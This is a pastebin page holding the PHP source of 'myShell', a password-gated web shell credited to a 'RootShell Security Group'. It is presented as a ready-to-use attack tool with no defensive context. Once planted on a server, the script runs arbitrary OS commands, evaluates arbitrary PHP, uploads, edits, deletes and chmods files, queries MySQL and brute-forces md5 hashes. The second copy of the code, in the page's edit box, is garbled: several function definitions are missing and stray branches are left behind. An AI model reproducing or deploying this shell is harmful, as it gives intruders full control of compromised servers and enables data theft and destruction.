pastebin - myShell - post number 1917250

Advertising

myShell
Sunday, August 15th, 2010 at 1:02:01am MDT

<?php
error_reporting(0); //If there is an error, we'll show it, k?
$password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
$me = basename(__FILE__);
$cookiename = "wieeeee";
 
if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{
 if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
 {
  $_POST['pass'] = md5($_POST['pass']);
 }
 if($_POST['pass'] == $password)
 {
   setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
 }
 reload();
}
 
if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
 login();
 die();
}
//
//Do not cross this line! All code placed after this block can't be executed without being logged in!
//
if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
 chdir($_GET['dir']);
}
 
$pages = array(
 'cmd' => 'Execute Command',
 'eval' => 'Evaluate PHP',
 'mysql' => 'MySQL Query',
 'chmod' => 'Chmod File',
 'phpinfo' => 'PHPinfo',
 'md5' => 'md5 cracker',
 'headers' => 'Show headers',
 'logout' => 'Log out'
);
//The header, like it?
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
<head>
<style>
td {
 font-size: 12px;
 font-family: verdana;
 color: #33FF00;
 background: #000000;
}
#d {
 background: #003000;
}
#f {
 background: #003300;
}
#s {
 background: #006300;
}
#d:hover
{
 background: #003300;
}
#f:hover
{
 background: #003000;
}
pre {
 font-size: 10px;
 font-family: verdana;
 color: #33FF00;
}
a:hover {
text-decoration: none;
}
 
input,textarea,select {
 border-top-width: 1px;
 font-weight: bold;
 border-left-width: 1px;
 font-size: 10px;
 border-left-color: #33FF00;
 background: #000000;
 border-bottom-width: 1px;
 border-bottom-color: #33FF00;
 color: #33FF00;
 border-top-color: #33FF00;
 font-family: verdana;
 border-right-width: 1px;
 border-right-color: #33FF00;
}
hr {
color: #33FF00;
background-color: #33FF00;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
<table width=100%><td id="header" width=100%>
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>]  [<a href="'.$me.'">Home</a>] ';
foreach($pages as $page => $page_name)
{
 $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
print $header;
$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';
 
//
//Page handling
//
if(isset($_REQUEST['p']))
{
  switch ($_REQUEST['p']) {
 
   case 'cmd': //Run command
 
    print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
     if(isset($_REQUEST['command']))
     {
      print "<pre>";
      execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
     }
   break;
 
 
   case 'edit': //Edit a fie
    if(isset($_POST['editform']))
    {
     $f = $_GET['file'];
     $fh = fopen($f, 'w') or print "Error while opening file!";
     fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
     fclose($fh);
    }
    print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";
 
    if(file_exists($_GET['file']))
    {
     $rd = file($_GET['file']);
     foreach($rd as $l)
     {
      print htmlspecialchars($l);
     }
    }
 
    print "</textarea><input type=submit value=\"Save\"></form>";
 
   break;
 
   case 'delete': //Delete a file
 
    if(isset($_POST['yes']))
    {
     if(unlink($_GET['file']))
     {
      print "File deleted successfully.";
     }
     else
     {
      print "Couldn't delete file.";
     }
    }
 
 
    if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
    {
     print "Are you sure you want to delete ".$_GET['file']."?<br>
     <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
     <input type=hidden name=yes value=yes>
     <input type=submit value=\"Delete\">
     ";
    }
 
 
   break;
 
 
   case 'eval': //Evaluate PHP code
 
    print "<form action=\"".$me."?p=eval\" method=POST>
    <textarea cols=60 rows=10 name=\"eval\">";
    if(isset($_POST['eval']))
    {
     print htmlspecialchars($_POST['eval']);
    }
    else
    {
     print "print \"Yo Momma\";";
    }
    print "</textarea><br>
    <input type=submit value=\"Eval\">
    </form>";
 
    if(isset($_POST['eval']))
    {
     print "<h1>Output:</h1>";
     print "<br>";
     eval($_POST['eval']);
    }
 
   break;
 
   case 'chmod': //Chmod file
 
 
    print "<h1>Under construction!</h1>";
    if(isset($_POST['chmod']))
    {
    switch ($_POST['chvalue']){
     case 777:
     chmod($_POST['chmod'],0777);
     break;
     case 644:
     chmod($_POST['chmod'],0644);
     break;
     case 755:
     chmod($_POST['chmod'],0755);
     break;
    }
    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
    }
    if(isset($_GET['file']))
    {
     $content = urldecode($_GET['file']);
    }
    else
    {
     $content = "file/path/please";
    }
 
    print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
    <select name=\"chvalue\">
<option value=\"777\">777</option>
<option value=\"644\">644</option>
<option value=\"755\">755</option>
</select><input type=submit value=\"Change\">";
 
   break;
 
   case 'mysql': //MySQL Query
 
   if(isset($_POST['host']))
   {
    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
    mysql_select_db($_POST['dbase']);
    $sql = $_POST['query'];
 
 
    $result = mysql_query($sql);
 
   }
   else
   {
    print "
    This only queries the database, doesn't return data!<br>
    <form action=\"".$me."?p=mysql\" method=POST>
    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
    <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>
 
    <b>Query:<br></b<textarea name=query></textarea>
    <input type=submit value=\"Query database\">
    </form>
    ";
 
   }
 
   break;
 
   case 'createdir':
   if(mkdir($_GET['crdir']))
   {
   print 'Directory created successfully.';
   }
   else
   {
   print 'Couldn\'t create directory';
   }
   break;
 
 
   case 'phpinfo': //PHP Info
    phpinfo();
   break;
 
 
   case 'rename':
 
    if(isset($_POST['fileold']))
    {
     if(rename($_POST['fileold'],$_POST['filenew']))
     {
      print "File renamed.";
     }
     else
     {
      print "Couldn't rename file.";
     }
 
    }
    if(isset($_GET['file']))
    {
     $file = basename(htmlspecialchars($_GET['file']));
    }
    else
    {
     $file = "";
    }
 
    print "Renaming ".$file." in folder ".realpath('.').".<br>
        <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
     <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
     <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
     <input type=submit value=\"Rename file\">
     </form>";
   break;
 
   case 'md5':
   if(isset($_POST['md5']))
   {
   if(!is_numeric($_POST['timelimit']))
   {
   $_POST['timelimit'] = 30;
   }
   set_time_limit($_POST['timelimit']);
    if(strlen($_POST['md5']) == 32)
    {
 
      if($_POST['chars'] == "9999")
      {
      $i = 0;
      while($_POST['md5'] != md5($i) && $i != 100000)
       {
        $i++;
       }
      }
      else
      {
       for($i = "a"; $i != "zzzzz"; $i++)
       {
        if(md5($i == $_POST['md5']))
        {
         break;
        }
       }
      }
 
     if(md5($i) == $_POST['md5'])
     {
       print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
     }
 
    }
 
   }
 
   print "Will bruteforce the md5
    <form action=\"".$me."?p=md5\" method=POST>
    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
    <b>Characters:</b><br><select name=\"chars\">
    <option value=\"az\">a - zzzzz</option>
    <option value=\"9999\">1 - 9999999</option>
    </select>
    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
    <input type=submit value=\"Bruteforce md5\">
    </form><br>*: if set_time_limit is allowed by php.ini";
   break;
 
   case 'headers':
   foreach(getallheaders() as $header => $value)
   {
   print htmlspecialchars($header . ":" . $value)."<br>";
 
   }
   break;
  }
}
else //Default page that will be shown when the page isn't found or no page is selected.
{
 
 $files = array();
 $directories = array();
 
 if(isset($_FILES['uploadedfile']['name']))
{
 $target_path = realpath('.').'/';
 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
     print "File:".  basename( $_FILES['uploadedfile']['name']).
     " has been uploaded";
 } else{
     echo "File upload failed!";
 }
}
 
 
 
 
 print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
 if ($handle = opendir('.'))
 {
  while (false !== ($file = readdir($handle)))
  {
        if(is_dir($file))
     {
    $directories[] = $file;
     }
     else
     {
    $files[] = $file;
     }
  }
 asort($directories);
 asort($files);
  foreach($directories as $file)
  {
   print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }
 
  foreach($files as $file)
  {
   print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }
 }
 else
 {
  print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
 }
 
 print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
<input type=\"submit\" value=\"Upload File\" />
</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
</table>";
 
}
 
function login()
{
 print "<table border=0 width=100% height=100%><td valign=\"middle\"><center>
 <form action=".basename(__FILE__)." method=\"POST\"><b>Password?</b>
 <input type=\"password\" maxlength=\"32\" name=\"pass\"><input type=\"submit\" value=\"Login\">
 </form>";
}
function reload()
{
 header("Location: ".basename(__FILE__));
}
function get_execution_method()
{
 if(function_exists('passthru')){ $m = "passthru"; }
 if(function_exists('exec')){ $m = "exec"; }
 if(function_exists('shell_exec')){ $m = "shell_ exec"; }
 if(function_exists('system')){ $m = "system"; }
 if(!isset($m)) //No method found :-|
 {
  $m = "Disabled";
 }
 return($m);
}
function execute_command($method,$command)
{
 if($method == "passthru")
 {
  passthru($command);
 }
 
 elseif($method == "exec")
 {
  exec($command,$result);
  foreach($result as $output)
  {
   print $output."<br>";
  }
 }
 
 elseif($method == "shell_exec")
 {
  print shell_exec($command);
 }
 
 elseif($method == "system")
 {
  system($command);
 }
}
function perm($file)
{
 if(file_exists($file))
 {
  return substr(sprintf('%o', fileperms($file)), -4);
 }
 else
 {
  return "????";
 }
}
function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}
 
}
function show_dirs($where)
{
 if(ereg("^c:",realpath($where)))
 {
 $dirparts = explode('\\',realpath($where));
 }
 else
 {
 $dirparts = explode('/',realpath($where));
 }
 
 
 
 $i = 0;
 $total = "";
 
 foreach($dirparts as $part)
 {
  $p = 0;
  $pre = "";
  while($p != $i)
  {
   $pre .= $dirparts[$p]."/";
   $p++;
 
  }
  $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
  $i++;
 }
 
 return "<h2>".$total."</h2><br>";
}
print $footer;
// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
exit();
?>

Paste Details

Tags: php shell

advertising

Update the Post

Either update this post and resubmit it with changes, or make a new post.

You may also comment on this post.

update paste below

<?php
error_reporting(0); //If there is an error, we'll show it, k?
$password = ""; // You can put a md5 string here too, for plaintext passwords: max 31 chars.
$me = basename(__FILE__);
$cookiename = "wieeeee";

if(isset($_POST['pass'])) //If the user made a login attempt, "pass" will be set eh?
{
 if(strlen($password) == 32) //If the length of the password is 32 characters, threat it as an md5.
 {
  $_POST['pass'] = md5($_POST['pass']);
 }
 if($_POST['pass'] == $password)
 {
   setcookie($cookiename, $_POST['pass'], time()+3600); //It's alright, let hem in
 }
 reload();
}

if(!empty($password) && !isset($_COOKIE[$cookiename]) or ($_COOKIE[$cookiename] != $password))
{
 login();
 die();
}
//
//Do not cross this line! All code placed after this block can't be executed without being logged in!
//
if(isset($_GET['p']) && $_GET['p'] == "logout")
{
setcookie ($cookiename, "", time() - 3600);
reload();
}
if(isset($_GET['dir']))
{
 chdir($_GET['dir']);
}

$pages = array(
 'cmd' => 'Execute Command',
 'eval' => 'Evaluate PHP',
 'mysql' => 'MySQL Query',
 'chmod' => 'Chmod File',
 'phpinfo' => 'PHPinfo',
 'md5' => 'md5 cracker',
 'headers' => 'Show headers',
 'logout' => 'Log out'
);
//The header, like it?
$header = '<html>
<title>'.getenv("HTTP_HOST").' ~ Shell I</title>
<head>
<style>
td {
 font-size: 12px;
 font-family: verdana;
 color: #33FF00;
 background: #000000;
}
#d {
 background: #003000;
}
#f {
 background: #003300;
}
#s {
 background: #006300;
}
#d:hover
{
 background: #003300;
}
#f:hover
{
 background: #003000;
}
pre {
 font-size: 10px;
 font-family: verdana;
 color: #33FF00;
}
a:hover {
text-decoration: none;
}

input,textarea,select {
 border-top-width: 1px;
 font-weight: bold;
 border-left-width: 1px;
 font-size: 10px;
 border-left-color: #33FF00;
 background: #000000;
 border-bottom-width: 1px;
 border-bottom-color: #33FF00;
 color: #33FF00;
 border-top-color: #33FF00;
 font-family: verdana;
 border-right-width: 1px;
 border-right-color: #33FF00;
}
hr {
color: #33FF00;
background-color: #33FF00;
height: 5px;
}
</style>
</head>
<body bgcolor=black alink="#33CC00" vlink="#339900" link="#339900">
<table width=100%><td id="header" width=100%>
<p align=right><b>[<a href="http://www.rootshell-team.info">RootShell</a>]  [<a href="'.$me.'">Home</a>] ';
foreach($pages as $page => $page_name)
{
 $header .= ' [<a href="?p='.$page.'&dir='.realpath('.').'">'.$page_name.'</a>] ';
}
$header .= '<br><hr>'.show_dirs('.').'</td><tr><td>';
print $header;
$footer = '<tr><td><hr><center>&copy; <a href="http://www.ironwarez.info">Iron</a> & <a href="http://www.rootshell-team.info">RootShell Security Group</a></center></td></table></body></head></html>';

//
//Page handling
//
if(isset($_REQUEST['p']))
{
  switch ($_REQUEST['p']) {

case 'cmd': //Run command

print "<form action=\"".$me."?p=cmd&dir=".realpath('.')."\" method=POST><b>Command:</b><input type=text name=command><input type=submit value=\"Execute\"></form>";
     if(isset($_REQUEST['command']))
     {
      print "<pre>";
      execute_command(get_execution_method(),$_REQUEST['command']); //You want fries with that?
     }
   break;

case 'edit': //Edit a fie
    if(isset($_POST['editform']))
    {
     $f = $_GET['file'];
     $fh = fopen($f, 'w') or print "Error while opening file!";
     fwrite($fh, $_POST['editform']) or print "Couldn't save file!";
     fclose($fh);
    }
    print "Editing file <b>".$_GET['file']."</b> (".perm($_GET['file']).")<br><br><form action=\"".$me."?p=edit&file=".$_GET['file']."&dir=".realpath('.')."\" method=POST><textarea cols=90 rows=15 name=\"editform\">";

if(file_exists($_GET['file']))
    {
     $rd = file($_GET['file']);
     foreach($rd as $l)
     {
      print htmlspecialchars($l);
     }
    }

print "</textarea><input type=submit value=\"Save\"></form>";

break;

case 'delete': //Delete a file

if(isset($_POST['yes']))
    {
     if(unlink($_GET['file']))
     {
      print "File deleted successfully.";
     }
     else
     {
      print "Couldn't delete file.";
     }
    }

if(isset($_GET['file']) && file_exists($_GET['file']) && !isset($_POST['yes']))
    {
     print "Are you sure you want to delete ".$_GET['file']."?<br>
     <form action=\"".$me."?p=delete&file=".$_GET['file']."\" method=POST>
     <input type=hidden name=yes value=yes>
     <input type=submit value=\"Delete\">
     ";
    }

break;

case 'eval': //Evaluate PHP code

print "<form action=\"".$me."?p=eval\" method=POST>
    <textarea cols=60 rows=10 name=\"eval\">";
    if(isset($_POST['eval']))
    {
     print htmlspecialchars($_POST['eval']);
    }
    else
    {
     print "print \"Yo Momma\";";
    }
    print "</textarea><br>
    <input type=submit value=\"Eval\">
    </form>";

if(isset($_POST['eval']))
    {
     print "<h1>Output:</h1>";
     print "<br>";
     eval($_POST['eval']);
    }

break;

case 'chmod': //Chmod file

print "<h1>Under construction!</h1>";
    if(isset($_POST['chmod']))
    {
    switch ($_POST['chvalue']){
     case 777:
     chmod($_POST['chmod'],0777);
     break;
     case 644:
     chmod($_POST['chmod'],0644);
     break;
     case 755:
     chmod($_POST['chmod'],0755);
     break;
    }
    print "Changed permissions on ".$_POST['chmod']." to ".$_POST['chvalue'].".";
    }
    if(isset($_GET['file']))
    {
     $content = urldecode($_GET['file']);
    }
    else
    {
     $content = "file/path/please";
    }

print "<form action=\"".$me."?p=chmod&file=".$content."&dir=".realpath('.')."\" method=POST><b>File to chmod:
    <input type=text name=chmod value=\"".$content."\" size=70><br><b>New permission:</b>
    <select name=\"chvalue\">
<option value=\"777\">777</option>
<option value=\"644\">644</option>
<option value=\"755\">755</option>
</select><input type=submit value=\"Change\">";

break;

case 'mysql': //MySQL Query

if(isset($_POST['host']))
   {
    $link = mysql_connect($_POST['host'], $_POST['username'], $_POST['mysqlpass']) or die('Could not connect: ' . mysql_error());
    mysql_select_db($_POST['dbase']);
    $sql = $_POST['query'];

$result = mysql_query($sql);

}
   else
   {
    print "
    This only queries the database, doesn't return data!<br>
    <form action=\"".$me."?p=mysql\" method=POST>
    <b>Host:<br></b><input type=text name=host value=\"localhost\" size=10><br>
    <b>Username:<br><input type=text name=username value=\"root\" size=10><br>
    <b>Password:<br></b><input type=password name=mysqlpass value=\"\" size=10><br>
    <b>Database:<br><input type=text name=dbase value=\"test\" size=10><br>

<b>Query:<br></b<textarea name=query></textarea>
    <input type=submit value=\"Query database\">
    </form>
    ";

}

break;

case 'createdir':
   if(mkdir($_GET['crdir']))
   {
   print 'Directory created successfully.';
   }
   else
   {
   print 'Couldn\'t create directory';
   }
   break;

case 'phpinfo': //PHP Info
    phpinfo();
   break;

case 'rename':

if(isset($_POST['fileold']))
    {
     if(rename($_POST['fileold'],$_POST['filenew']))
     {
      print "File renamed.";
     }
     else
     {
      print "Couldn't rename file.";
     }

}
    if(isset($_GET['file']))
    {
     $file = basename(htmlspecialchars($_GET['file']));
    }
    else
    {
     $file = "";
    }

print "Renaming ".$file." in folder ".realpath('.').".<br>
        <form action=\"".$me."?p=rename&dir=".realpath('.')."\" method=POST>
     <b>Rename:<br></b><input type=text name=fileold value=\"".$file."\" size=70><br>
     <b>To:<br><input type=text name=filenew value=\"\" size=10><br>
     <input type=submit value=\"Rename file\">
     </form>";
   break;

case 'md5':
   if(isset($_POST['md5']))
   {
   if(!is_numeric($_POST['timelimit']))
   {
   $_POST['timelimit'] = 30;
   }
   set_time_limit($_POST['timelimit']);
    if(strlen($_POST['md5']) == 32)
    {

if($_POST['chars'] == "9999")
      {
      $i = 0;
      while($_POST['md5'] != md5($i) && $i != 100000)
       {
        $i++;
       }
      }
      else
      {
       for($i = "a"; $i != "zzzzz"; $i++)
       {
        if(md5($i == $_POST['md5']))
        {
         break;
        }
       }
      }

if(md5($i) == $_POST['md5'])
     {
       print "<h1>Plaintext of ". $_POST['md5']. " is <i>".$i."</i></h1><br><br>";
     }

}

print "Will bruteforce the md5
    <form action=\"".$me."?p=md5\" method=POST>
    <b>md5 to crack:<br></b><input type=text name=md5 value=\"\" size=40><br>
    <b>Characters:</b><br><select name=\"chars\">
    <option value=\"az\">a - zzzzz</option>
    <option value=\"9999\">1 - 9999999</option>
    </select>
    <b>Max. cracking time*:<br></b><input type=text name=timelimit value=\"30\" size=2><br>
    <input type=submit value=\"Bruteforce md5\">
    </form><br>*: if set_time_limit is allowed by php.ini";
   break;

case 'headers':
   foreach(getallheaders() as $header => $value)
   {
   print htmlspecialchars($header . ":" . $value)."<br>";

}
   break;
  }
}
else //Default page that will be shown when the page isn't found or no page is selected.
{

$files = array();
 $directories = array();

if(isset($_FILES['uploadedfile']['name']))
{
 $target_path = realpath('.').'/';
 $target_path = $target_path . basename( $_FILES['uploadedfile']['name']);
 if(move_uploaded_file($_FILES['uploadedfile']['tmp_name'], $target_path)) {
     print "File:".  basename( $_FILES['uploadedfile']['name']).
     " has been uploaded";
 } else{
     echo "File upload failed!";
 }
}

print "<table border=0 width=100%><td width=5% id=s><b>Options</b></td><td id=s><b>Filename</b></td><td id=s><b>Size</b></td><td id=s><b>Permissions</b></td><td id=s>Last modified</td><tr>";
 if ($handle = opendir('.'))
 {
  while (false !== ($file = readdir($handle)))
  {
        if(is_dir($file))
     {
    $directories[] = $file;
     }
     else
     {
    $files[] = $file;
     }
  }
 asort($directories);
 asort($files);
  foreach($directories as $file)
  {
   print "<td id=d><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=d><a href=\"".$me."?dir=".realpath($file)."\">".$file."</a></td><td id=d></td><td id=d><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=d>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }

foreach($files as $file)
  {
   print "<td id=f><a href=\"?p=rename&file=".realpath($file)."&dir=".realpath('.')."\">[R]</a><a href=\"?p=delete&file=".realpath($file)."\">[D]</a></td><td id=f><a href=\"".$me."?p=edit&dir=".realpath('.')."&file=".realpath($file)."\">".$file."</a></td><td id=f>".filesize($file)."</td><td id=f><a href=\"?p=chmod&dir=".realpath('.')."&file=".realpath($file)."\"><font color=".get_color($file).">".perm($file)."</font></a></td><td id=f>".date ("Y/m/d, H:i:s", filemtime($file))."</td><tr>";
  }
 }
 else
 {
  print "<u>Error!</u> Can't open <b>".realpath('.')."</b>!<br>";
 }

print "</table><hr><table border=0 width=100%><td><b>Upload file</b><br><form enctype=\"multipart/form-data\" action=\"".$me."?dir=".realpath('.')."\" method=\"POST\">
<input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"100000000\" /><input size=30 name=\"uploadedfile\" type=\"file\" />
<input type=\"submit\" value=\"Upload File\" />
</form></td><td><form action=\"".$me."\" method=GET><b>Change Directory<br></b><input type=text size=40 name=dir value=\"".realpath('.')."\"><input type=submit value=\"Change Directory\"></form></td>
<tr><td><form action=\"".$me."\" method=GET><b>Create file<br></b><input type=hidden name=dir value=\"".realpath('.')."\"><input type=text size=40 name=file value=\"".realpath('.')."\"><input type=hidden name=p value=edit><input type=submit value=\"Create file\"></form>
</td><td><form action=\"".$me."\" method=GET><b>Create directory<br></b><input type=text size=40 name=crdir value=\"".realpath('.')."\"><input type=hidden name=dir value=\"".realpath('.')."\"><input type=hidden name=p value=createdir><input type=submit value=\"Create directory\"></form></td>
</table>";

}

elseif($method == "exec")
 {
  exec($command,$result);
  foreach($result as $output)
  {
   print $output."<br>";
  }
 }

elseif($method == "shell_exec")
 {
  print shell_exec($command);
 }

elseif($method == "system")
 {
  system($command);
 }
}
function perm($file)
{
 if(file_exists($file))
 {
  return substr(sprintf('%o', fileperms($file)), -4);
 }
 else
 {
  return "????";
 }
}
function get_color($file)
{
if(is_writable($file)) { return "green";}
if(!is_writable($file) && is_readable($file)) { return "white";}
if(!is_writable($file) && !is_readable($file)) { return "red";}

}
function show_dirs($where)
{
 if(ereg("^c:",realpath($where)))
 {
 $dirparts = explode('\\',realpath($where));
 }
 else
 {
 $dirparts = explode('/',realpath($where));
 }

$i = 0;
 $total = "";

foreach($dirparts as $part)
 {
  $p = 0;
  $pre = "";
  while($p != $i)
  {
   $pre .= $dirparts[$p]."/";
   $p++;

}
  $total .= "<a href=\"".basename(__FILE__)."?dir=".$pre.$part."\">".$part."</a>/";
  $i++;
 }

return "<h2>".$total."</h2><br>";
}
print $footer;
// Exit: maybe we're included somewhere and we don't want the other code to mess with ours :-)
exit();
?>

details of the post (optional)

Note: Only the paste content is required, though the following information can be useful to others.

Name / Title: Save name / title?
Description / Question:
Tags: (space separated, optional)
Content Type:
Expire this post in:
Encrypt this paste. Password:

Please note that information posted here will expire by default in one month. If you do not want it to expire, please set the expiry time above. If it is set to expire, web search engines will not be allowed to index it prior to it expiring. Items that are not marked to expire will be indexable by search engines. Be careful with your passwords. All illegal activities will be reported and any information will be handed over to the authorities, so be good.

pastebin - myShell - post number 1917250

Stuff to Do

Paste Actions

Information

Paste Details

Quick Search

Recent Posts

Advertising

myShell
Sunday, August 15th, 2010 at 1:02:01am MDT

Paste Details

advertising

Update the Post

pastebin - myShell - post number 1917250

Stuff to Do

Paste Actions

Information

Paste Details

Quick Search

Recent Posts

Advertising

myShellSunday, August 15th, 2010 at 1:02:01am MDT

Paste Details

advertising

Update the Post

myShell
Sunday, August 15th, 2010 at 1:02:01am MDT